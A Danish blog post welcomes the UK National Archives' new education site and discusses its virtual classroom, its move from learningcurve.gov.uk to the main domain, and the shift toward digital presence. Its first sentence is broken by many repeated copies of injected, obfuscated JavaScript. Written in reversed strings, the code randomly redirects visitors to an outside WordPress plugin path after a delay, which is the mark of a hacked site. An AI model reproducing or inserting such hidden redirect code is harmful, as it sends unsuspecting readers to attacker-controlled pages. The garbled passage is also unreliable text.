Inspiration til skolesites fra National Archives

na_education

Jeg har med stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor spænding imødeset den nye undervisningssite fra National Archives. Siden slutningen af forrige århundrede har det britiske Rigsarkiv været stedet, hvor nordiske arkivfolk søgte inspiration, og i reglen blev helt ternede af misundelse over alle de superfede tiltag som kom fra den anden side af kanalen 🙂

Den gamle skolesite “The Learning Curve” er nu lavet om, og rummer også nye tiltag. Bl.a. mulighed for videokonferencer og et “virtuelt klasseværelse”, som interesserede kan booke sig til. I betragtning af de problemstillinger som har været refereret fra bl.a. dream-undersøgelsen (“Digitale undervisningsmidler er marginale”) kunne det være interessant at følge dette initiativ og om muligt få del i nogle af de erfaringer som høstes. Men selve pointen, at det ikke kun er tekster, billeder og lignende ressourcer,  men også fagpersonen på kulturarvsinstitutionen, der “digitaliseres” og kommer ud til skolen/klasseværelset, er lidt anderledes. Er det ikke endnu et eksempel på den udvikling, som sætter stadigt mere fokus på den digitiale tilstedeværelse i forhold til det fysiske sted?  (jvfr. bl.a. Mikkel Thelles gode artikel fra Nord Nytt).

Strukturelt er der også sket noget på NA´s site. Tidligere havde skolesiten en selvstændig url http://learningcurve.gov.uk (redirecter nu ;-). Den nye skolesite er derimod en del af den ordinære site http://www.nationalarchives.gov.uk, hvor det findes som et emne under punktet “Research and Learning”. Umiddelbart kunne man godt gætte på, at der ligger forskellige domænestrategiske overvejelser bag. Fx et ønske om at samle flere netsteder under ét for at styrke brand-domænet og undgå at klatte for meget med sin “net-værdi”?

Jeg har ventet spændt på at se siten, og mine gode venner ovre på http://arkivformidling.wordpress.com kom først med at blogge det.

Skriv et svar